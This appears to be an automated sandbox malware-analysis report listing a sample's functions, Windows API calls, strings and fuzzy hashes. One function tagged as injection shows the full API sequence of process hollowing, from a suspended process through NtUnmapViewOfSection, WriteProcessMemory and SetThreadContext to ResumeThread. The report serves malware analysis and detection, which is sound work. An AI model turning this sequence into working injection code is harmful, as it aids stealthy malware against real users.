                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1E21
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 013C1E31
                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1E34
                                                                      • Part of subcall function 013C1DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E5E
                                                                      • Part of subcall function 013C1DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013C1E71
                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 013CBEAA
                                                                    • GetProcAddress.KERNEL32(00000000,000002A8), ref: 013CBF04
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 013CBF0F
                                                                    • GetUserNameW.ADVAPI32(?,00000100), ref: 013CBF82
                                                                    • GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 013CC062
                                                                      • Part of subcall function 013CDF30: Concurrency::cancel_current_task.LIBCPMT ref: 013CDFE4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                    • String ID: 152138533219$7b717a
                                                                    • API String ID: 1144133639-2095519259
                                                                    • Opcode ID: 6d2bd34c4f519747af48135aaa2ae0b5a902e90d8fc541055388a7ca8fde817e
                                                                    • Instruction ID: 4ff1fed44546130e7a58f377602ca23ac5c3208d8cdf7c3394dc10d7aa4ce246
                                                                    • Opcode Fuzzy Hash: 6d2bd34c4f519747af48135aaa2ae0b5a902e90d8fc541055388a7ca8fde817e
                                                                    • Instruction Fuzzy Hash: 5EF29971A201148BEB1CDB2CCC8979DBB77AF85718F1486ACE409A73D5DB359EC48B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CDB30, Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Heap$Name$AllocProcess$AccountLookupUser$ConvertPathStringTemp
                                                                    • String ID:
                                                                    • API String ID: 188542827-0
                                                                    • Opcode ID: 08b97d8bf7289a12cf856fd779f342e030ed63eee15f5b17a19d92c5e0e3266f
                                                                    • Instruction ID: b10db323306c8a1ff4fb7d87882b6cd3a0784c3255170ff7ad44390b84ca0fc3
                                                                    • Opcode Fuzzy Hash: 08b97d8bf7289a12cf856fd779f342e030ed63eee15f5b17a19d92c5e0e3266f
                                                                    • Instruction Fuzzy Hash: F4316571A10108ABEB14EBE8DC85BDEBBB99F10708F608128F610A72C4DB75AD44C7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D63B5, Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,013D1A7A,?), ref: 013D63BD
                                                                    • GetLastError.KERNEL32(?,013D1A7A,?), ref: 013D63C7
                                                                    • __dosmaperr.LIBCMT ref: 013D63CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 1545401867-0
                                                                    • Opcode ID: b55a92ae707d5f546f17dfdd49598204892961a1ecb682defdb71d3bfbdffeff
                                                                    • Instruction ID: b7e7e2afa840f75736b363abf171c4052e00ce5e88de994ce83cc53cd441b6bb
                                                                    • Opcode Fuzzy Hash: b55a92ae707d5f546f17dfdd49598204892961a1ecb682defdb71d3bfbdffeff
                                                                    • Instruction Fuzzy Hash: BDD0C97215860867CB612AB9B80951A3BAD9A90379B140615F52DCA0E1DE65D8508650
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CD7C0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 24sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: Prls$`}a$image/jpeg
                                                                    • API String ID: 3472027048-2897437755
                                                                    • Opcode ID: 6bde15838c2c7bb53d7ae99ff6d6405bbd300a69b94034e1e71534e5315f2ab5
                                                                    • Instruction ID: 4e963c60922f8bda81b5ff9701868745dddd49dba92bd6e7752805610a72f7f3
                                                                    • Opcode Fuzzy Hash: 6bde15838c2c7bb53d7ae99ff6d6405bbd300a69b94034e1e71534e5315f2ab5
                                                                    • Instruction Fuzzy Hash: 20E01229F5056627C82536FD4C1752F7C6A6AF2D5CB85015CF8022F3DAEC511E1603D7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CF079, Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 013C1CAE
                                                                      • Part of subcall function 013CFCD6: RaiseException.KERNEL32(E06D7363,00000001,00000003,013C1C8C,013CD82C,E8013EFD,?,013C1C8C,?,013ED4DC), ref: 013CFD36
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 013CF5B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionFeaturePresentProcessorRaise___std_exception_copy
                                                                    • String ID:
                                                                    • API String ID: 1131819199-0
                                                                    • Opcode ID: d1fe264f5e9ddf10b88cf0ea82a781fc866c0522d62bfc327554f1ee20843fd4
                                                                    • Instruction ID: 2d1299c9639f4234f61d4a76ce64688ca894b13bba72ed5303c57598540df873
                                                                    • Opcode Fuzzy Hash: d1fe264f5e9ddf10b88cf0ea82a781fc866c0522d62bfc327554f1ee20843fd4
                                                                    • Instruction Fuzzy Hash: 79519FB29007058BEB29CF6CD584AAEBBFAFB04B28F10842ED505EB295D7709D40CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D1A27, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 013D1A86
                                                                      • Part of subcall function 013D63B5: DeleteFileW.KERNEL32(?,?,013D1A7A,?), ref: 013D63BD
                                                                      • Part of subcall function 013D63B5: GetLastError.KERNEL32(?,013D1A7A,?), ref: 013D63C7
                                                                      • Part of subcall function 013D63B5: __dosmaperr.LIBCMT ref: 013D63CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast__dosmaperr_free
                                                                    • String ID:
                                                                    • API String ID: 3353641461-0
                                                                    • Opcode ID: e12bf4c26256cce72a0c2d11fe04fcaead5e294f254c2306c3beb019a0cf5616
                                                                    • Instruction ID: 3185963941c0813b3a0cda6c59a6151e69064301b3913c53a58276c440725465
                                                                    • Opcode Fuzzy Hash: e12bf4c26256cce72a0c2d11fe04fcaead5e294f254c2306c3beb019a0cf5616
                                                                    • Instruction Fuzzy Hash: EC013173D01219AFEF01EBBCAC017AE7FF4AB54268F144166E924E2191EA708A44CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D585A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,013CD82C,?,?,013CF093,013CD82C,?,013CDFB8,E8013EFE,74E06490), ref: 013D588C
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 8f90ab9eba8d46e6d0c8008193c32d390b8f3a8a3e14fa1ec0cc665aea72a57b
                                                                    • Instruction ID: 80d8dc44d51b84a4e06d1e24810a3f71e42503d73df86d9628332b996ba4d038
                                                                    • Opcode Fuzzy Hash: 8f90ab9eba8d46e6d0c8008193c32d390b8f3a8a3e14fa1ec0cc665aea72a57b
                                                                    • Instruction Fuzzy Hash: 49E0657374522B5AFB3126ADBC0275A3E7CEB516A9F050161AD15965C0CF20DC008AA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CD810, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 0560ef75f6586407be2edb795b258b48d424fb0674dd45e7dbbc5736d7ee4ce6
                                                                    • Instruction ID: 894cc355b0ad3ca189ea07dc944c7f0b8e706b36268b9370cd6117e2996be754
                                                                    • Opcode Fuzzy Hash: 0560ef75f6586407be2edb795b258b48d424fb0674dd45e7dbbc5736d7ee4ce6
                                                                    • Instruction Fuzzy Hash: 6EE08C29F1062623C82132FD4C2742F7C296AE2D5CB86019DE8022B3CAEC920E1603D3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CD860, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 14c0e04c04c4a89f0d0d458d1b421dbde5617a6da72bee1260e24012bb173d78
                                                                    • Instruction ID: 14df280c24c70d73a809b3f046f3658b5071fd8d2e64fcfd842e2abff16b4f69
                                                                    • Opcode Fuzzy Hash: 14c0e04c04c4a89f0d0d458d1b421dbde5617a6da72bee1260e24012bb173d78
                                                                    • Instruction Fuzzy Hash: 9CE01229F5062623C82532FE5C1752F7C696AF2D6CBC5019CF8062B3DAEC861E1643D3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 013C2250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 013C226C
                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 013C22C5
                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 013C22DE
                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 013C22F3
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013C2316
                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 013C232E
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 013C2335
                                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 013C2354
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 013C236F
                                                                    • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 013C23AC
                                                                    • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 013C23DC
                                                                    • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 013C23F2
                                                                    • ResumeThread.KERNEL32(?,?,?,00000000), ref: 013C23FB
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 013C2409
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 013C2420
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                    • API String ID: 4033543172-1050664331
                                                                    • Opcode ID: 2d54448dc8e956e248548a8ee6a8cc44b7de285cc5501930aadea6edee0f1c0d
                                                                    • Instruction ID: a572b0ab26ece965e7ee327ea6a0c399548f3c56052bc1785e853cd8ee75e2b0
                                                                    • Opcode Fuzzy Hash: 2d54448dc8e956e248548a8ee6a8cc44b7de285cc5501930aadea6edee0f1c0d
                                                                    • Instruction Fuzzy Hash: 3D515BB1A40315ABEB219F94DC46FEABBB8FF08715F104024F609EA1C1D7B5A954CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013D3828, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 013D3920
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 013D392A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 013D3937
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
